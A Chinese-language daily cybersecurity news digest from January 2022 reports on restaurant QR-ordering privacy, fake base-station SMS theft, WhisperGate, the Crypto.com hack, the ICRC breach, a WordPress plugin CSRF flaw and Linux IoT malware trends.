《IT时报》记者从扫码点餐系统供应商处了解到,现在大多数餐厅的做法是通过小程序来引流。“商家把关注公众号的动作放到了小程序里,顾客扫了小程序码之后,就能看到店里的优惠活动,包括新会员有什么优惠、充值有什么优惠等,引导顾客加入会员,对于拉新和复购还是非常有效果的。”程女士说。


《IT时报》记者在体验扫码点餐时发现,有的商家在点餐页面设置了关注公众号的提示,有的商家则在点餐界面上设置了开通会员的菜单栏。


“还有一些商家把扫码点餐二维码换成企业微信二维码,扫了企业微信二维码后,顾客就会收到扫码点餐链接。日后,在企业微信上,商家也可以做私域营销,和顾客一对一沟通等,但其实这种也算强关注。”程女士透露。


某餐厅企业微信


03必须把选择权还给顾客


“我此前在饭店就餐,经常碰到扫码点餐需要强制授权个人信息的情况,现在这种情况虽然还没有完全杜绝,但的确少了一些。”市民张先生向《IT时报》记者表示,商家需要流量、需要对顾客进行营销都是正常的市场化手段,可以理解,但必须把选择权还给顾客。


有媒体报道称,今年1月,上海九翊餐饮管理有限公司在其管理的“望蓉城”餐厅内提供扫码点餐服务,要求消费者必须授权手机号码才能完成扫码点餐,且未告知收集消费者手机号的目的。被相关部门罚款5万元。


此前,有律师向《IT时报》记者表示,餐厅如果可以在系统内设置不收集信息、不获取授权,让顾客直接点餐,那么获取姓名、手机号、微信等信息明显属于没必要,可消费者不仅失去选择的自由,还有泄露隐私的风险,这是否有必要?


用户数据代表着用户的喜好和痛点,拿捏了这些数据就意味着商家的“手”已经伸进了用户的口袋,但对于用户来说,很多时候甚至不知道是谁泄露了个人隐私。


上海市消保委曾多次呼吁“餐厅应该不收集或者尽可能少收集消费者的信息”,好在,逐步趋严的监管给一些违法操作戴上了紧箍咒。


“数字化如何与个人信息保护之间保持平衡,是值得探讨的问题,其中重要的点是个人的选择权、知情权要受到保护。”在博通咨询金融行业资深分析师王蓬博看来,广告、关注、私域沟通这样的流量模式虽然短期内有利于商家生态体系发展,但从长远来看,是会损坏品牌形象的,在符合法律法规的前提下,要掌握好度。

【阅读原文】



2022年1月24日 星期一

今日资讯速览:

1、嵌入式设备是勒索软件的下一个目标吗?


2、欧洲议会通过《数字服务法》 加强网络巨头经营监管


3、睡了一觉啥也没干 醒来就被盗刷8000块?



1、嵌入式设备是勒索软件的下一个目标吗?


2021年将被记住,因为这一年勒索软件团伙将注意力转向关键基础设施,尤其是围绕制造业、能源分配和食品生产的公司作为目标。仅仅是Colonial Pipeline的勒索软件就导致了5500英里的管道关闭,因为人们担心对其IT网络的勒索软件攻击会蔓延到控制分配燃料的管道的操作网络。


运营技术(OT)网络控制着对生产线、发电厂和能源供应的持续运营至关重要的设备,因此通常与公司面向互联网的IT网络相分离,以更好地隔离关键硬件,避免网络攻击。针对OT网络的成功攻击很少,但在Colonial勒索软件攻击之后,CISA警告说,关键基础设施所有者面临的威胁越来越大。

 

现在,安全研究人员正在警告这些OT网络上的嵌入式设备所带来的风险。嵌入式设备安全供应商Red Balloon Security在新的研究中发现,有可能在现实世界网络中使用的嵌入式系统上部署勒索软件。


该公司说,它在施耐德电气Easergy P5保护继电器中发现了漏洞,该设备在发现故障时触发断路器,是现代电网运行和稳定的关键。


这个漏洞可以被利用来部署勒索软件的有效载荷,从而实现了一个"复杂但可重复的"过程。施耐德电气的一位发言人表示,"对网络威胁非常警惕,在得知施耐德电气Easergy P5保护继电器的漏洞后,立即着手解决这些问题"。


Red Balloon的创始人兼联合首席执行官Ang Cui表示,虽然勒索软件攻击已经袭击了关键基础设施供应商的IT网络,但成功破坏OT嵌入式设备可能"破坏性更大"。因为公司不习惯或没有经验从对嵌入式设备本身的攻击中恢复,如果设备被毁或无法恢复,那么就需要寻找替代设备,而这可能需要数周时间,因为供应有限。


安全专家Window Snyder去年推出了一家创业公司,帮助物联网制造商可靠和安全地提供软件更新到他们的设备,他说,嵌入式设备可能成为一个容易的目标,特别是当其他入口点变得更有弹性。谈到嵌入式系统,它们中的很多都没有权限分离,它们中的很多都没有在代码和数据之间进行分离,而且它们中的很多在开发时都认为它们会坐在有空气防护的网络上--这是不充分的。


研究表明,这些设备--许多都有几十年的历史--的安全性需要改进,并呼吁政府和商业部门的终端用户要求制造这些设备的供应商提高标准。发布固件修复是一种被动的、低效的方法,不会解决最关键任务的行业和服务的整体不安全问题。供应商需要将更多的安全降到嵌入式设备层面。政府需要在监管层面上做更多的工作,并认为需要给设备制造商施加更多的压力,因为他们目前没有动力在设备层面上建立更多的安全性。

【阅读原文】



2、欧洲议会通过《数字服务法》 加强网络巨头经营监管


欧洲议会当地时间20日以530票赞成、78票反对、80票弃权的表决结果通过《数字服务法》。据悉,该法律宗旨是进一步加强对大型互联网公司经营活动的监管。《数字服务法》随后将提交欧盟各成员国议会审议,在获得各国批准后生效并实施。


具体内容包括:限制大型网络公司利用数据优势未经允许向用户定向发送广告,限制对同类型公司的绞杀性兼并,要求这些公司加强对平台上非法内容的自查等。


该法律同时授权欧盟委员会对违反相关规定的公司最高处以该公司上一财年全球销售额6%的处罚。

【阅读原文】



3、睡了一觉啥也没干 醒来就被盗刷8000块?


一位女子半夜突然收到上百条验证码,全是绑定“ 中国移动和包服务……”到这里想必聪明点的朋友已经看出来了, 这肯定是有人想做坏事。这位女士也不傻,为了安全她开启了飞行模式,甚至后来还关掉了手机。但,还是出事了。

第二天,她被中国银联的电话惊醒,这才发现自己名下多个银行卡已经被绑定“ 中国移动和包快捷支付 ”,还被盗刷了 8000 多块。


  这,明明验证码在她的手机上,别人怎么绑定的?


而且她也从没点进过什么小网站,手机上不应该有木马软件呀……


后来警方一查才发现,犯罪分子用的是一种“ 新型技术类网络盗刷 ”—— 伪基站。


我们都知道,手机就是通过基站 ( 信号塔 )实现信号传送和收发。


而犯罪分子可以搭建一个假的基站,一旦连上你的手机,配合嗅探工具,就可以获取你收到的验证码,借此登录你的各种网银账号,帮你保管私房钱。

比如这个案子里,就是别人利用受害者的验证码,绑定了中国移动的和包快捷支付,然后开始盗刷。


不光如此,利用伪基站,犯罪分子还可以佯装成运营商、银行给你发信息。


如果轻易点进他们给的“ 链接 ”,输入了个人信息,那我们的资料就会被窃取……

可能有差友会问,伪基站到底怎么连上我们手机的?


其实这个技术说新不算新,早在 10 年前就已经出现了,我们之前也写过相关文章。


今天借着这个事,咱们再挖个坟,简单跟大家介绍一下……


其实想搞一个伪基站,门槛并不高。在被相关部门打击之前,花个万把块在网上就买到一整套。


你是有能力,一台笔记本,配个 SSRP 主板、功率放大器、射频电路 啥的,在家也可以搓出一套来。


设备搭好了,再利用工程机复制一份真实基站的参数信息,最后装个群发短信软件,一个丐中丐版的伪基站就做好了。

  提醒一下大家别想着自己搓,肯定不是这么简单的,而且搞伪基站也犯法。

做好了伪基站,犯罪分子就要出门作案了……


他们一般会把伪基站藏在书包里,如果实在太大了,那也会为此专门买辆车,塞进后备厢里。

嗯?这么注意安全,还要移动作案?


其实移动作案主要原因,是伪基站需要距离足够近,才能连上受害者的手机。


我们可以把基站信号看成磁铁的磁力, 哪个基站的信号越强,手机就会被吸过去。 ( 在伪基站案件中,犯罪分子往往就在受害者附近)。


那问题来了,手机连上了伪基站,分辨不出真假?


其实不是分辨不出,而是压根没权力分辨。


因为中国移动和联通 2G 网络采用的是 GSM 系统,它 有个 短板,就是 单向鉴权。

什么意思呢?


手机与基站通信时,基站可以对手机的身份进行认证, 但手机却不能对基站的身份进行认证……


所以就算是假的,手机也没法去分辨,直接默认它是真的……


接下来犯罪分子想伪造号码,想读取短信,也都轻而易举了。

看到这可能有差友问了,既然伪基站是钻了 2G 网络的漏洞,那我们不用 2G 不就好了,而且现在 4G 都这么普及了……


嗯,你说的很对。


但关键很多地方 2G 网络还没有拆除,黑产作案时,可以用技术挤掉你的 4G 信号,让手机转到 2G 。


而且就算你永远是 4G ,现在也已经有破解 4G LTE 的办法了……


真是有漏洞的地方,就有黑产……


不过大家也别太担心,伪基站现在越来越难做了。


比如不少手机厂商早开始搞防伪基站了,像是华为 Mate 8 的芯片自带识别伪基站功能。


因为伪基站有一些参数和真基站不同,通过对比参数,让手机辨别出基站真假,并不会驻留下去。

还有 MIUI 8 利用大数据,来分析短信是否来自伪基站。


另外随着通信技术发展,5G 不光自己可以判断伪基站,还能通过一些定位技术,寻找到伪基站的位置,配合相关部门进行打击。


不仅如此,随着支付平台的发展,只要账号在陌生环境下登录,或者绑定下银行卡,一般都要做个人脸识别啥的, 犯罪分子想要盗刷还 挺难的。


不过也有例外……


比如这个案件中,中国移动 “ 和包支付 ” 绑定银行卡,居然不需要人脸识别等本人验证方式, 提供银行卡号和手机验证码即可完成绑定。

这……难怪犯罪分子用你这个平台盗刷,风控不行啊……


现在我们只能期待运营商或者那些银行平台的风控能够更进一步了。


在这里,世超推荐各位尽量买配备伪基站识别功能的大厂手机,谁知道哪天犯罪分子会不会盯上我们。


最后,世超提醒黑产们一句,别想着赚快钱了,当年搞伪基站的那波人,现在缝纫机踩得可快了。 。

【阅读原文】



2022年1月22日 星期六

今日资讯速览:

1、Twitter大刀阔斧重整安全团队 被解雇高管曾是著名黑客


2、iOS 15.3/macOS 12.2已修复Safari泄露浏览历史漏洞


3、乌克兰遭网络攻击后,拜登威胁称将进行“网络”回应



1、Twitter大刀阔斧重整安全团队 被解雇高管曾是著名黑客


       Twitter旧金山总部。根据公司的一份备忘录,安全团队的变更是在“对组织领导方式的评估”之后进行的。


  Twitter本周对其安全团队的高层进行了改组,该公司周三对员工表示,新任首席执行官正在重组这家社交媒体服务公司,安全主管和首席信息安全官分别被解雇。


  Twitter证实,该公司安全部门的负责人皮特·扎特科(Peiter Zatko)已离开公司,他在安全领域更出名的名字是“Mudge”。首席信息安全官林基·塞西(Rinki Sethi)将在未来几周内离职。


  有媒体获得了Twitter首席执行官帕拉格·阿格拉沃尔(Parag Agrawal)周三发给员工的一份备忘录,该备忘录称,这些变化是在“对组织的领导方式以及其对最重要工作的影响进行评估”之后做出的。阿格拉瓦尔说,“这种情况的性质”限制了他可以与员工分享的内容。


  塞西和扎特科没有立即回应置评请求。


  阿格拉沃尔于去年11月被任命为Twitter的首席执行官,自接替创始人杰克·多尔西(Jack Dorsey)以来,他对公司的高管进行了改组。去年12月,阿格拉沃尔重组了领导团队,解雇了首席设计官丹特利·戴维斯(Dantley Davis)和工程主管迈克尔·蒙塔诺(Michael Montano)。


  扎特科和塞西于2020年底加入Twitter。扎特科是一名著名的黑客,在政府和私营企业工作了很长时间。在加入Twitter之前,他曾在DARPA、谷歌和Stripe任职。上世纪90年代,他开始了自己的网络安全生涯,当时他是黑客组织Cult of the Dead Cow的成员。2020年7月,十几岁的青少年入侵了推特的系统,并接管了知名用户的账户,之后他被招进了推特。


  塞西也是在黑客入侵后加入Twitter的,她和扎特科一起被指派提高公司的安全性,保护用户数据。她曾在IBM担任信息安全副总裁,并曾在Intuit和沃尔玛(Walmart)从事安全工作。


  据Twitter现任和前任员工透露,该公司隐私工程主管丽娅•基斯纳(Lea Kissner)将出任临时首席信息安全官。她曾在谷歌和苹果公司担任安全和隐私方面的领导职务。

【阅读原文】



2、iOS 15.3/macOS 12.2已修复Safari泄露浏览历史漏洞


近日,苹果正在修复一项 Safari 漏洞,可导致用户浏览历史和 Google ID 泄露。在 iOS 15.3 RC 和 macOS Monterey 12.2 RC 中,苹果已经修复了这个 bug,这两个版本都在周四向开发者和测试版用户发布。


这个漏洞最早是由 FingerprintJS 发现的,它显示网站可以利用在 IndexedDB(一种用于存储数据的 Javascript API)中发现的漏洞来访问用户最近访问的 URL,甚至获得用户的 Google ID 和相关的个人数据。


FingerprintJS 随后建立了一个演示网站,展示该漏洞的工作原理,任何人都可以访问该网站,看看它是如何知道你最近访问过的一些 URL 和你的 Google 账户的细节。经过测试表明,iOS 15.3 和 macOS Monterey 12.2 已经修复了这个漏洞。


据 FingerprintJS 称,该漏洞影响了今天的构建之前的所有 iOS 15 和 macOS Monterey 版本。iOS 14 没有受到该漏洞的影响,以及在运行 macOS Monterey 之前版本的 Mac 上仍有Safari 14的用户。

【阅读原文】



3、乌克兰遭网络攻击后,拜登威胁称将进行“网络”回应


周三下午,美国总统拜登对有关乌克兰政府系统遭受广泛网络攻击的报道做出了回应,他告诉记者,如果俄罗斯继续针对乌克兰的数字基础设施,美国将用自己的网络攻击做出回应。 

 

拜登发表上述言论之前,乌克兰官员告诉记者,上周至少有两个政府机构在内的数十个系统在一次网络攻击中遭到破坏。微软发布了一篇关于清除恶意软件的详细博客,名为“WhisperGate”,并表示是在1月13日首次发现的。


在对 WhisperGate 的后续检查中,安全公司 CrowdStrike 表示,该恶意软件旨在“不可逆转地破坏受感染主机的数据,并试图伪装成真正的现代勒索软件操作”。


“然而,WhisperGate 引导加载程序没有解密或数据恢复机制,并且与通常部署在勒索软件操作中的恶意软件不一致,”CrowdStrike 解释说。


该活动让人想起 VOODOO BEAR的破坏性 NotPetya 恶意软件,该恶意软件包括一个组件,在重新启动后模拟合法的 chkdsk 实用程序,并破坏了受感染主机的主文件表 (MFT)——微软 NTFS 文件系统的一个关键组件。然而,  WhisperGate 引导加载程序不太复杂,目前无法识别出与 VOODOO BEAR 操作的技术重叠。


乌克兰国家特别通信和信息保护局局长Yurii Shchyhol告诉《华盛顿邮报》,受雨刷影响的机构之一是机动车辆保险局。这些擦除器是在70 多个乌克兰政府网站,据称与俄罗斯秘密服务有关的团体污损后几天推出的。


虽然最初不清楚网站破坏和雨刮器攻击是否是协调的,但乌克兰官员本周证实它们是同时发生的。建立了大约50个政府网站的公司Kitsoft告诉Zetter,他们也在其系统上发现了 WhisperGate 恶意软件。


乌克兰国家特殊通信和保护局在一份声明中证实了Zetter 的报道。乌克兰官员就黑客如何进入他们的系统提出了几种理论,认为原因可能是 CMS 漏洞。


乌克兰国家警察局网络警察部门还表示,黑客可能已经利用Log4J 漏洞或通过被盗的员工账户进入。


据《华盛顿邮报》报道,俄罗斯已向其与乌克兰接壤的边境派遣了超过 10 万名士兵。美联社本周 报道说,波兰也在提高其全国网络安全恐怖威胁级别,以应对对乌克兰的袭击。

【阅读原文】



2022年1月21日 星期五

今日资讯速览:

1、打造网络空间安全基础设施!欧盟计划建设安全DNS平台


2、Crypto.com承认超过3000万美元被黑客窃取


3、白宫将加强美国国家安全局和国防部的网络防御措施



1、打造网络空间安全基础设施!欧盟计划建设安全DNS平台


欧盟准备建设自己的递归DNS服务,并将向各欧盟机构及公众免费开放。


这项名为DNS4EU的拟议服务项目当前处于初步规划阶段,欧盟正在寻找合作伙伴帮助其建设一套庞大的基础设施,以服务欧盟旗下全部27个成员国。


欧盟官员表示,在观察到由少数非欧盟运营商掀起的DNS市场合并浪潮后,他们开始研究如何在欧盟内部建立起可以集中管理的DNS服务。


官员们在上周公布DNS4EU基础设施项目时表示,“DNS4EU的目标在于解决DNS解析服务被少数企业把控的问题。这种过度集中可能导致DNS解析过程极易受到影响,甚至出现一家主要运营商宕机、大片区域解析服务停转的现象。”


欧盟官员们还表示,DNS4EU项目的立项也有其他因素的推动,包括网络安全与数据隐私保护。


DNS4EU包含强大的过滤功能


欧盟提到,DNS4EU将配备内置过滤功能,可以阻止对恶意域名的DNS名称解析,例如托管有恶意软件、网络钓鱼站点或其他涉及网络安全威胁的域名。


这项过滤功能将由受信合作伙伴(如各国CERT团伙)提供的威胁情报源进行加持,可用于保护欧洲各地、各类组织免受常见恶意威胁的侵扰。


目前尚不清楚DNS4EU会不会在所有欧盟国家、或者至少是在各国政府机构内实施强制推广,如果确实如此,那么CERT-EU等组织将获得更大的管控力与敏捷性,在发现网络攻击后第一时间加以阻断。


除此之外,欧盟官员还希望使用DNS4EU的过滤系统阻止对其他各类管控内容的访问,具体实施可以结合法院命令执行。虽然官方没有详细说明,但这里所指的很可能是发布儿童性侵素材及涉及版权侵犯(盗版)内容的域名。


欧盟表示,拟议中的DNS4EU系统还需要遵循各项数据处理法律(比如GDPR),确保域名解析数据的具体处理只在欧洲本土进行,同时禁止出售任何个人数据或利用个人数据赚取经济利益。


在技术细节方面,DNS4EU需要支持所有现代DNS标准与技术,包括DNSSEC、DoT、DoH等,同时兼容IPv6。


官员们还强调,项目在正式上线之后将面向所有人开放,涵盖公共机构、私营部门以及个人用户。


被选中建设DNS4EU的一家或多家公司还将负责创建并运行专项网站,其中将包含关于用户应如何修改设备中的DNS设置、从而使用DNS4EU服务器进行域名解析的说明性指导。


最终效果将取决于多方面因素


电子邮件与DNS服务企业Open-Xchange的政策与创新主管Vittorio Bertola在接受邮件采访时回应称,“我认为此举是数字主权战略中的一项必要举措:欧洲民众应该可以选择这种免费的欧盟自有公共解析方案,至少可以将其作为谷歌等当前具有市场优势的非欧盟解析服务的替代产品。”


Bertola还补充道,“如果谷歌的服务因任何原因而在欧洲无法正常使用,则当前用户应该可以立即切换至其他替代选项。此外,考虑到CLOUD法案以及近期关于欧盟-美国数据出口裁定内容,大部分企业、尤其是公共机构,都将必须按照GDPR合规性条款中的要求使用由欧盟企业集团拥有的基础服务。”


“而且即使大部分用户仍旧继续使用非欧盟服务,只要保证存在有效的替代方案,对欧盟来说就已经是一项重要成就、一份安全保障。”


然而,Bertola也对DNS4EU如何长期存续提出了质疑,因为该服务明确强调禁止利用用户数据追求任何经济利益。在这样的定位思路下,欧洲网络运营商不会有任何推广动力,最终可能导致项目惨遭淘汰。毕竟没人想做赔本的买卖。


Bertola提出,“另一个重要方面在于合规性。目前全球各类解析服务均宣称不受欧洲各国封锁令的限制(例如针对海盗湾或SciHub的封禁命令);但事实上,正常访问这类非法网站本身就是用户们放弃本地互联网服务商解析服务、转向国外全球服务的核心原因之一。”


他认为,“所以很明显,这将是欧盟DNS解析服务无法忽视的又一个大问题。”


“总而言之,委员会的努力确实值得称道,很多厂商也必然会考虑竞标。但考虑能否真正转化为参与,这项服务的上线又能否带来长期变化,目前恐怕还很难断言。DNS4EU的未来命运将取决于多方面因素。”

【阅读原文】



2、Crypto.com承认超过3000万美元被黑客窃取


在周四凌晨发表的一篇博客文章中,加密货币交易所Crypto.com承认,在1月17日发生黑客攻击后,该公司损失了远远超过3000万美元的比特币和以太坊。事件发生后,该公司被批评一直围绕网络安全问题对外模糊沟通,昨天才由首席执行官Kris Marszalek正式确认。


新的博客文章说,未经授权的提款总价值为4836.26ETH和443.93BTC--按照目前的汇率,分别大约相当于1520万美元和1860万美元,同时还有价值66200美元的其他法币,总共有483名Crypto.com用户的账户被泄露。


Crypto.com表示,所有受影响的客户的损失都得到了充分补偿。该公司的最新声明称已有了对安全漏洞的更深入了解,尽管确切入侵方法的细节仍不清楚。


"2022年1月17日星期一,约12:46 UTC,Crypto.com的风险监控系统检测到少数用户账户有未经授权的活动,在用户没有完成在2FA认证控件中输入凭据的情况下,交易被批准,"该帖子写道。"这引发了多个团队的立即响应,以评估其影响。在调查期间,平台上的所有提款被暂停。任何被发现受到影响的账户都被完全恢复。"


随后,该交易所已将其双因素认证系统迁移到一个新的架构,并撤销了所有现有的2FA令牌,这意味着所有客户将需要切换到新系统。


Crypto.com被黑是针对加密货币交易所的一连串攻击中的最新一次,这些交易所中存放的稳步增长的加密货币生态系统中价值最高的一些目标。根据NBC News的分析,2021年有超过20个交易所被黑,黑客以超过1000万美元的利润逃脱,还有6个案例,被盗资金价值超过1亿美元。

【阅读原文】



3、白宫将加强美国国家安全局和国防部的网络防御措施


据CNET报道,美国总统拜登周三签署了一份备忘录,以改善美国政府最敏感计算机网络的在线安全措施。继去年5月签署行政命令后,这份新的美国国家安全备忘录旨在提高美国国家安全局、国防部和其他情报收集组织的网络安全措施,要求它们达到或超过联邦民用网络的水平。

白宫在一份声明中说,这份17页的文件 “建立在拜登政府保护我们国家免受来自民族国家行为者和网络犯罪分子的复杂恶意网络活动的工作之上”。“我们正在以前所未有的方式优先考虑和提升网络安全。”


它授权情报机构和相关承包商采用商业世界中常见的做法--如包括加密、云技术和多因素认证。它还要求受影响的组织向被称为政府机密系统“国家管理者”的国家安全局报告网络攻击事件,并开发工具,在机密和非机密系统之间安全地共享数据。


据《华尔街日报》报道,在美国国家安全局前承包商雇员爱德华·斯诺登于2013年泄露了数千份机密文件后,国家安全局近十年来一直渴望缩小网络安全差距。

上周,白宫官员会见了来自苹果、Google、微软、Red Hat、甲骨文和其他科技公司的高层管理人员,讨论如何在上个月发现Log4Shell之后提高开源软件的安全性,Log4Shell是Java日志库Apache Log4j的一个巨大安全漏洞,使数千万网络连接设备受到攻击。


虽然没有联邦机构因Log4j漏洞而受到影响,但美国网络安全和基础设施安全局局长Jen Easterly说,这是她职业生涯中见过的最严重的一次。


Easterly本月早些时候告诉记者:“我们确实预计Log4Shell会在未来很长时间内被用于入侵。”

【阅读原文】



2022年1月20日 星期四

今日资讯速览:

1、Cynerio报告:医院中一半的联网设备容易受到黑客攻击


2、红十字国际委员会遭受网络攻击 超51.5万名“高危人群”的数据遭泄露


3、突发!美国政府对阿里云开展“国家安全”审查



1、Cynerio报告:医院中一半的联网设备容易受到黑客攻击


根据医疗网络安全公司Cynerio的一份新报告,医院中使用的互联网连接设备有一半以上存在漏洞,可能会危及病人安全、机密数据或设备的可用性。

该报告分析了全球300多家医院和医疗机构的1000多万台设备的数据,该公司通过连接到设备上的连接器收集这些数据,作为其安全平台的一部分。


医院里最常见的互联网连接设备类型是输液泵。这些设备可以远程连接到电子医疗记录,提取正确剂量的药物或其他液体,并将其分配给病人。报告发现,输液泵也是最有可能存在可被黑客利用的漏洞的设备,73%的设备存在漏洞。专家们担心,像这些与患者直接相关的设备被黑客利用,可能会被用来直接伤害或威胁伤害人。例如,理论上有人可以进入这些系统并改变药物的剂量。


其他常见的与互联网连接的设备是病人监护仪,它可以跟踪心率和呼吸率等生理参数,以及超声波检查。就漏洞数量而言,这两种类型的设备都在前十名之列。

医疗机构现在是黑客的一个主要目标,虽然直接攻击与互联网连接的医疗设备似乎还没有发生,但专家认为这是一种可能性。更积极的威胁来自于一些团体,他们通过一个易受攻击的设备入侵医院系统,并锁定医院的数字网络--使医生和护士无法访问医疗记录、设备和其他数字工具--并要求支付赎金来解锁它们。这些攻击在过去几年中不断升级,它们减慢了医院的运作速度,甚至会伤害到病人。


Cynerio的报告指出,医疗设备中的大多数漏洞是很容易修复的:它们是由于弱密码或默认密码或组织没有采取行动的召回通知。许多医疗机构只是没有资源或人员来保持系统的更新,可能不知道是否有关于他们某个设备的更新或警报。


但专家说,像这样的报告,再加上日益频繁的勒索软件攻击,正在推动更多的医疗机构投资网络安全。网络安全公司Censinet的首席执行官兼创始人Ed Gaudet去年秋天对The Verge说:“我认为这已经达到了一个关键程度,正在引起首席执行官和董事会的注意。”

【阅读原文】



2、红十字国际委员会遭受网络攻击 超51.5万名“高危人群”的数据遭泄露


据CNN报道,红十字国际委员会(ICRC)周三表示,该组织使用的一个承包商遭到的网络攻击已经泄露了超过51.5万名“高危人群”的个人数据,包括因冲突和灾难而与家人分离的人。


该人道主义组织说,黑客攻击迫使红十字会关闭了支持因冲突、移民或灾难而分离的家庭团聚的IT系统。

 

目前还不清楚谁是这次网络事件的责任人,但红十字会表示,它 “最担心的问题”是这些数据可能会被泄露。红十字会称,目前还没有迹象表明这种情况已经发生。


红十字国际委员会总干事罗伯特·马尔迪尼在一份声明中说:“我们都感到震惊和困惑,这些人道主义信息会成为目标并被泄露。”


该人道主义组织表示,黑客攻击了一家位于瑞士的公司,红十字会付钱给这家公司存储其数据。被泄露的数据来自至少60个“国家协会”,即红十字会在世界各地的志愿者和工作人员网络,红十字会将其作为灾难的第一反应者。


红十字会发言人Elizabeth Shaw在一封电子邮件中告诉CNN:“作为第一步,我们将与最相关的红十字会代表团以及当地的红十字会和红新月会合作,寻找方法通知那些数据可能已被泄露的个人和家庭,正在采取哪些措施来保护他们的数据以及他们可能面临的风险。”


Shaw说,这一事件与勒索软件无关,红十字会正在与“高度专业化”的网络安全公司合作,以应对黑客攻击。


日内瓦红十字会总部的前网络战顾问Lukasz Olejnik告诉CNN,这次事件“似乎是红十字会历史上最大和最敏感的漏洞,而且考虑到其敏感性,可能是迄今为止所有人道主义组织的漏洞”。


作为独立网络安全顾问的Olejnik告诉CNN,红十字会应该考虑向作为《日内瓦公约》缔约国的政府寻求帮助,以从网络攻击中恢复过来。

【阅读原文】



3、突发!美国政府对阿里云开展“国家安全”审查



【阅读原文】



2022年1月19日 星期三

今日资讯速览:

1、3 个 WordPress 插件中的高严重性缺陷影响了 84,000 个网站


2、去年针对Linux发行版本的恶意软件数量同比增加35%


3、北约能源安全卓越中心发布关键能源基础设施中保护工业自动化和控制系统免遭网络事件影响的指南



1、3 个 WordPress 插件中的高严重性缺陷影响了 84,000 个网站


来自 WordPress 安全公司 Wordfence 的研究人员发现了一个严重漏洞,该漏洞影响了三个不同的 WordPress 插件,影响了超过 84,000 个网站。被跟踪为 CVE-2022-0215 的漏洞是一个跨站点请求伪造 ( CSRF ) 问题,其 CVSS 评分为 8.8。


威胁行为者可以利用该漏洞接管易受攻击的网站。


该漏洞影响了 Xootix 维护的三个插件:


登录 / 注册弹出窗口 (超过 20000 次安装)

侧车 Woocommerce  (超过 4000 次安装)

候补名单 Woocommerce  (超过 60000 次安装)


“2021 年 11 月 5 日,Wordfence 威胁情报团队针对我们在 “登录 / 注册弹出窗口” 中发现的漏洞启动了负责任的披露流程,这是一个安装在 20,000 多个站点上的 WordPress 插件。几天后,我们在同一作者开发的另外两个插件中发现了相同的漏洞:“ Side Cart Woocommerce (Ajax) ”,安装在 60,000 多个网站上,以及 “ Waitlist Woocommerce (Back in stock notifier) ”,安装在超过 4,000 个站点。” 阅读 Wordfence 发布的咨询。“这个漏洞使攻击者可以在易受攻击的站点上更新任意站点选项,前提是他们可以欺骗站点管理员执行操作,例如单击链接。”


XootiX 的三个插件旨在为 WooCommerce 网站提供增强功能。Login/Signup Popup 插件允许将登录和注册弹出窗口添加到标准站点和运行 WooCommerce 插件的站点,Waitlist WooCommerce 插件允许为缺货项目添加产品候补名单和通知器,Side Cart Woocommerce 旨在使购物车可以从网站上的任何地方使用,所有这些都通过 AJAX 提供支持。


受影响的插件注册了通过 wp_ajax action 启动的 save_settings 函数。该缺陷的根本原因是缺乏对发送 AJAX 请求的完整性的验证。


攻击者可以滥用该问题将站点上的 “users_can_register”(即任何人都可以注册)选项更新为 true,并将 “default_role” 设置(即在博客上注册的用户的默认角色)设置为管理员,因此他们可以在易受攻击的网站上注册为管理员并完全接管它。


“这使得攻击者可以制作一个触发 AJAX 操作并执行该功能的请求。如果攻击者可以成功诱骗站点管理员执行诸如单击链接或浏览到某个网站之类的操作,而管理员已通过目标站点的身份验证,则该请求将成功发送并触发该操作,该操作将允许攻击者更新该网站上的任意选项。” 继续分析。


WordPress 用户必须检查其网站上运行的版本是否已更新为这些插件可用的最新修补版本,即 “登录 / 注册弹出窗口” 的 2.3 版,“Waitlist Woocommerce” 的 2.5.2 版(有库存通知程序) )”,以及 “Side Cart Woocommerce (Ajax)” 的 2.1 版。


以下是此漏洞的时间表:


2021 年 11 月 5 日 —— 插件分析的结论导致在登录 / 注册弹出插件中发现 CSRF 到任意选项更新漏洞。我们开发并发布防火墙规则来保护 Wordfence 用户。Wordfence Premium 用户会立即收到此规则。我们开始与开发商联系,并在同一天提供全面披露。


2021 年 11 月 10 日 – 我们跟进开发人员,通知他们 “Side Cart Woocommerce (Ajax)” 和 “Waitlist Woocommerce (Back in stock notifier)” 插件也受到相同漏洞的影响。


2021 年 11 月 19 日 – 我们与开发人员跟进以检查补丁的状态。


2021 年 11 月 24 日 – “登录 / 注册弹出窗口” 的修补版本作为 2.3 版发布。


2021 年 11 月 24 日 - 2021 年 12 月 13 日 - 我们尝试与开发人员跟进有关其余两个插件的补丁。


2021 年 12 月 5 日 – 免费 Wordfence 用户可以使用防火墙规则。


2021 年 12 月 17 日 – “Waitlist Woocommerce (Back in stock notifier)” 的补丁版本发布为 2.5.2,“Side Cart Woocommerce (Ajax)” 的补丁版本发布为 2.1。


————————————————

原文作者:全球网络安全资讯

转自链接:https://www.wangan.com/p/7fy7fg0f12152f75

版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。



2、去年针对Linux发行版本的恶意软件数量同比增加35%


根据 CrowdStrike 的威胁遥测数据,在 2021 年针对 Linux 发行版本(被物联网设备广泛部署)的恶意软件数量比 2020 年增加了 35%。其中 XorDDoS、Mirai 和 Mozi 这前三个恶意软件家族在 2021 年占所有基于 Linux 的 IoT 恶意软件的 22%。

v51dvxnl.webp

与 2020 年相比,Mozi 在 2021 年的野外样本数量大幅增加了 10 倍。这些恶意软件家族的主要目的是破坏脆弱的互联网连接设备,将它们聚集成僵尸网络,并利用它们来进行分布式拒绝服务(DDoS)攻击。


当今大多数的云基础设施和网络服务器都运行 Linux,但它也为移动和物联网设备提供动力。它之所以受欢迎,是因为它提供了可扩展性、安全功能和广泛的发行版,以支持多种硬件设计和在任何硬件要求上的巨大性能。


随着各种 Linux 构建和分布在云基础设施、移动和物联网的核心,它为威胁者提供了一个巨大的机会。例如,无论是使用硬编码凭证、开放端口还是未修补的漏洞,运行Linux的物联网设备对威胁者来说都是一个低风险的果实--它们的大规模破坏会威胁到关键互联网服务的完整性。预计到2025年底,将有超过300亿台物联网设备连接到互联网,为威胁和网络犯罪分子创造一个潜在的巨大攻击面,以创建大规模的僵尸网络。


僵尸网络是一个连接到远程指挥和控制(C2)中心的受损设备网络。它在更大的网络中发挥着小齿轮的作用,并能感染其他设备。僵尸网络经常被用于DDoS攻击,向目标发送垃圾邮件,获得远程控制,并进行加密等CPU密集型活动。DDoS攻击使用多个连接互联网的设备来访问一个特定的服务或网关,通过消耗整个带宽来阻止合法流量的通过,导致其崩溃。


● XorDDoS

